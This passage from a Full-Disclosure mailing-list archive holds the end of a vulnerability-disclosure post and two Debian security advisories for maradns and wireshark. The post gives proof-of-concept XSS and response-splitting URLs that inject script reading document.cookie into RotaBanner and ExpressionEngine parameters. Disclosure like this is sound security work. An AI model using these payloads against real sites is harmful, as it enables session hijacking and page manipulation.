          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

 Original article (in Russian):
          http://securityvulns.ru/Sdocument667.html
          http://securityvulns.ru/Sdocument546.html
 Additional details (in Ukrainian):
          http://websecurity.com.ua/1641/
          http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 crossite scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument625.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument472.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1454/
 
-=-=-=-

 There  are  also  few vulnerabilities published in English as a part of
 the Month of Bugs in CAPTCHA:
 
Cryptographp  <=  1.2  WordPress plugin multiple persistant crossite
scriptings

 Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

 Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

 Original article: http://websecurity.com.ua/1588/
 

 
-- 
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/



From jmm at debian.org  Thu Jan  3 21:15:41 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:15:41 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1445-1] New maradns packages fix
	denial of service
Message-ID: <20080103211541.GA11434@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1445-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 03, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : maradns
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0061

Michael Krieger and Sam Trenholme discovered a programming error in
MaraDNS, a simple security-aware Domain Name Service server, which
might to denial of service through malformed DNS packets.

For the stable distribution (etch), this problem has been fixed in
version 1.2.12.04-1etch2.

For the old stable distribution (sarge), this problem has been fixed
in version 1.0.27-2.

For the unstable distribution (sid), this problem has been fixed in
version 1.2.12.08-1.

We recommend that you upgrade your maradns package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2.dsc
    Size/MD5 checksum:      568 b211f2c8bb6f589b68e470dd3cbb7bf7
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27.orig.tar.gz
    Size/MD5 checksum:   706012 5fd4a3e8024a0a7561f09e3ff3955cf2
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2.diff.gz
    Size/MD5 checksum:    13750 5eec451105342d404680363cc55304d4

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_alpha.deb
    Size/MD5 checksum:   334558 e9504463d1aeb92f2a9850f06731d37d

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_amd64.deb
    Size/MD5 checksum:   293844 0ae412e1fc143990be4c10c7c3ef27db

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_arm.deb
    Size/MD5 checksum:   279548 f73c92834aa322530dd7ac8a5b7987b8

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_hppa.deb
    Size/MD5 checksum:   301566 7cd905a3e7c890b691e60acf8a4ad179

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_i386.deb
    Size/MD5 checksum:   280286 fc8b498709e17b015e6f5d2daa7044ec

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_ia64.deb
    Size/MD5 checksum:   359728 adac044edb5a2062fd7e23f765c2b426

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_m68k.deb
    Size/MD5 checksum:   263496 6b0aca240a56ecd34b41136a07d99723

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_mips.deb
    Size/MD5 checksum:   304440 72a10d56ada559dac2ef3d7d8ef5ba37

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_mipsel.deb
    Size/MD5 checksum:   304524 7c7d31805416f4151e65c554e40bd5d5

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_powerpc.deb
    Size/MD5 checksum:   290008 6be1203722742a5f04543e0b414b5fa1

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_s390.deb
    Size/MD5 checksum:   288736 6d1f00a6dfffef9b48786b5d1f2dda86

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_sparc.deb
    Size/MD5 checksum:   277652 3aed2b89373691601c8e6daa88ea2758

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2.tar.gz
    Size/MD5 checksum:  1323244 032465dca4842731ab78edb065d0caed
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2.dsc
    Size/MD5 checksum:      503 024c6dfc89a28dd7113b10eadad124fa

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_alpha.deb
    Size/MD5 checksum:   550836 6fcf2d7f2652c098688d35e40a901b49

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_amd64.deb
    Size/MD5 checksum:   500544 2ca8d84ecc72ace553ab24b99ebb90e9

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_arm.deb
    Size/MD5 checksum:   477186 2b6ba5db9a98ffdc38352d0a1b3cff84

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_hppa.deb
    Size/MD5 checksum:   522826 f6a32d023392e55de5358fb6b98643e4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_i386.deb
    Size/MD5 checksum:   471410 7083cec7888c69efee3440ce59417dd8

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_ia64.deb
    Size/MD5 checksum:   661664 be8d5c96b8400c17e7624bf754fdd5b4

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_mips.deb
    Size/MD5 checksum:   528270 8eab540505b58fdb2c2f3dc72d284a14

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_mipsel.deb
    Size/MD5 checksum:   529546 b72a7386b2ede6c4cfeb083ae43e5a4e

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_powerpc.deb
    Size/MD5 checksum:   487420 03cc439b6fdfc8dd222aba274ef4d539

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_s390.deb
    Size/MD5 checksum:   499454 cf0db50276a245147f57a0c556900a56

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_sparc.deb
    Size/MD5 checksum:   462932 8d32c8dc463c073a9c5621e6b98ac125


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVBMXm3vHE4uyloRAn+9AJ49C4PONv7sZ2Si6g9+ecFLZgeuyQCgwAld
srllxqwnxFQknzfCQpwGwbo=
=Dd5p
-----END PGP SIGNATURE-----



From jmm at debian.org  Thu Jan  3 21:31:39 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:31:39 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1446-1] New wireshark packages
	fix denial of service
Message-ID: <20080103213139.GA12241@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1446-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 03, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2007-6450 CVE-2007-6451

Several remote vulnerabilities have been discovered in the Wireshark
network traffic analyzer, which may lead to denial of service. The
Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2007-6450

    The RPL dissector could be tricked into an infinite loop.

CVE-2007-6451

    The CIP dissector could be tricked into excessive memory
    allocation.

For the old stable distribution (sarge), these problems have been fixed in
version 0.10.10-2sarge11. (In Sarge Wireshark used to be called Ethereal).

For the stable distribution (etch), these problems have been fixed in
version 0.99.4-5.etch.2.

For the unstable distribution (sid), these problems have been fixed in
version 0.99.7-1.

We recommend that you upgrade your wireshark packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10.orig.tar.gz
    Size/MD5 checksum:  7411510 e6b74468412c17bb66cd459bfb61471c
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11.diff.gz
    Size/MD5 checksum:   178746 933cfe01c6bd0906e46c96a7525eaaa9
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11.dsc
    Size/MD5 checksum:      857 0515d93e91a408a93f71604bc53da60e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum:  5473258 b9210afcc18fdbfdb4792915347fb387
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum:   543376 0251832610b4c2f07bcf915140b24195
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum:   106622 f0b57252d1c45defdfa375a41cbc57e6
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum:   155400 299e86be216b61506feb73da3176609b

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum:   486626 319742bfc1a65f5088625b5c20662b29
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum:  5334148 2c2fb3aa923bef3803a6030467b6ac39
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum:    99734 258f8660d8962e18cd957424989d66f1
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum:   154664 fe279aa0fa920e591cd99b5aacb363bf

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum:  4684386 322e970b88200331531ba40423ad00b0
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum:   473010 621f8e3ee24d6058028093418281e8e2
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum:    96418 31abb070e574a3001595bf35b5163b65
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum:   155950 c374875ca4d3545e492e294e71f33b32

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum:    98622 884882d2aa922acde1a92658190eacda
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum:  5787248 7768ca0724d2401156b709720f860ae2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum:   154680 9d295a56913577c5251bfc7b500ec1c9
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum:   489482 05641d54cb7a2395105e85215713a5dd

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum:    91062 223296e9280f5bdd1e352f5e1b32d541
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum:   154668 4cabf74d5aa3e316202fc6cc5b1fdab6
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum:   443836 0802c65cbd65f6479c695c4f110cdae5
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum:  4529566 f7cee09f268308fd2e249e1c0f393aa7

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum:   154668 f8bd4c79877ba95277553142d1b0ac48
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum:   129324 98a7422c9838a9d866c47866b395bcd2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum:   674590 be70a50979def7f1b9a39ba4a7a29819
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum:  6630622 31050587e2a5786c6c3d39164e827b32

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum:   447932 03fe7849d127361cc2d5ff6fa4fa3a66
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum:  5570160 33e74413a9258f10697b2d7c768acffc
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum:    91116 a2f24dfb47f144df4c9c651d899e0316
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum:   154754 bf89b5c4436d95c52ac7ba4669601533

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum:  4723264 2795ac4612f87ace234799c1bfca5daf
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum:   462960 6947d430b5e9260a218e953b3fd0e2fb
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum:   154674 7d3cc285c21b8ee328c623155b08e9d0
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum:    94914 ba091b5f869f1821e3587de4217b9dd8

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum:    94818 532c3b76afce29da2d50d6508fc8efc7
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum:   154680 a137ba8649f5b34fc8ee4bd1af246df2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum:   458216 54a6c2890e47769b2bf88e96faa5f7df
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum:  4460936 842eb862a5529c83328ef733223af631

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum:    94462 b13765526c8304fea6761fddfd646a95
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum:   455878 444e592e79b53b3c3e8ff6c74a66d41f
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum:  5068090 8b78b4443614b80d74c5e763538721a1
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum:   154678 3588fb9f40e66a71c48a7dc86083782c

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum:  5621666 1dd4004e6c4c8719aaba8b31390b095d
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum:   154662 bcf649ee810da0d4d892e83aeef797fd
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum:   100056 d9bfd2cb2e51411600e1005af43b4539
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum:   479816 6b1d615b5e04ba12ad3b4ae7ec8d8cc6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum:  5130376 d9ff58d019291252990735cf14601011
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum:   154684 8f68dc9a336e34723a4d6dd348898d47
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum:    93992 ee25522d8c19209831a8074a164dcef2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum:   465546 d8f11b286f25e69b796b0473210e3db0

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4.orig.tar.gz
    Size/MD5 checksum: 13306790 2556a31d0d770dd1990bd67b98bd2f9b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2.diff.gz
    Size/MD5 checksum:    43214 852f91f8eb38039a7c8765c4bd05f08c
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2.dsc
    Size/MD5 checksum:     1066 d7c8d2ff4d67149f020276757eaee490

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:    22052 7cb3b1309285b09dccf514e91628df28
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:  9319798 ba3b4ff7b8f39153c91f86d420b394f7
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:   181630 66ded130da4b19090a35452d602a1950
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:    21768 7aa512bedd63f205831228e58bb82897
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:   117266 68b717382a7a9a8226c5d5d10a77e100
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:    21772 2f10f5b5badc7a0e169ee22f960f5fb8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:    21780 d7622026fe2071fe65752a845d16e72f
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum:   674306 1b0f1ff481f32a6adb3424bec72abfab

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:    22408 60e4c2647b621acd6024d5f6529dfc37
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:    22402 6ea544466e1b19fb2e84b5ff60d4b9f3
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:   181670 07b9285896252f5f630ffca47afecdd9
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:   112030 23e49501be43ee6bb06c32af66b3c1de
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:  9119366 96cdc850cbf460b2e611299d91a0b405
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:   619608 a964d192aa76b6f1a544c0b78125500b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:    22744 72b205204f88c564faa0e4b961d35f7e
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum:    22396 8edaed490e0449d414be094232e868ad

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:   181922 ee62ef5c69ec18f7faf452d2c2c54a21
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:    22400 060200580222615ee5a05f6e706b7ad3
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:    22406 36ddaec9510a246830008d738e186f70
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:   107238 f85070e449a327961bb60c35f5d57634
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:    22760 f1ae6a49173592c44d892fcb387a2a96
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:  7739224 51d162e7dc971452a4010812ce0077a9
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:    22416 c5d9d3b28c6ca1c06a318c3a88c9b95e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum:   600466 982b4a3e062cd2ff624649a360881c29

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:   182544 bc7e9cfba13a84e9fe6a21ae14bd0cd6
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:   109740 7326c0f7465fde429230e5a1bc3f87dd
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:    22404 e534361488c208ec2bccccf9f64682c5
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:    22394 a2633b695eba48836b76b98239b49b68
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:    22742 4e83ef21c0cd7921bae69226d9de4591
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:    22402 ff7770c25c495f0d564d93042e010ba5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:   634564 b57123d9459ae329cea0db52898b599d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum:  9855304 2c1d014fa6b674ff33739f250597d9af

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:    22410 0d34d4a3b91993db7f6ffa8832cb80bb
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:    22396 5d01b4fb59d676b81ffe88463734b5f1
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:   182558 2ea2e58b559c438e0dbe3d8eae20526d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:  7502260 ea5a24b2bbf8bdb0e12d9b522d35d51e
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:    22402 a5e2d7d83467b19149c037612ae43ea0
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:   102208 00c4684ccf895233df30d748368ce386
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:    22752 15a7e72d32c9e2ea6af0f56d44fbdb6d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum:   564614 67bf694c2d06e07308881148e7544175

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:    22404 6a91b22e9fa38b460f86806b279f74f4
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:   827484 a0d3df63ed28965c092221815820327b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:    22738 92fbe2c822bf2fb40d9bca7dbc56c9c6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 10651058 e14498025cff7520fcf213665b958f01
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:   145656 2ec77fee2fa37f8ff2b472bb7112a14a
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:    22392 969b40957504305712c6a4940b6c30ec
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:    22408 49d75556f5873612d7b664ca6849f22b
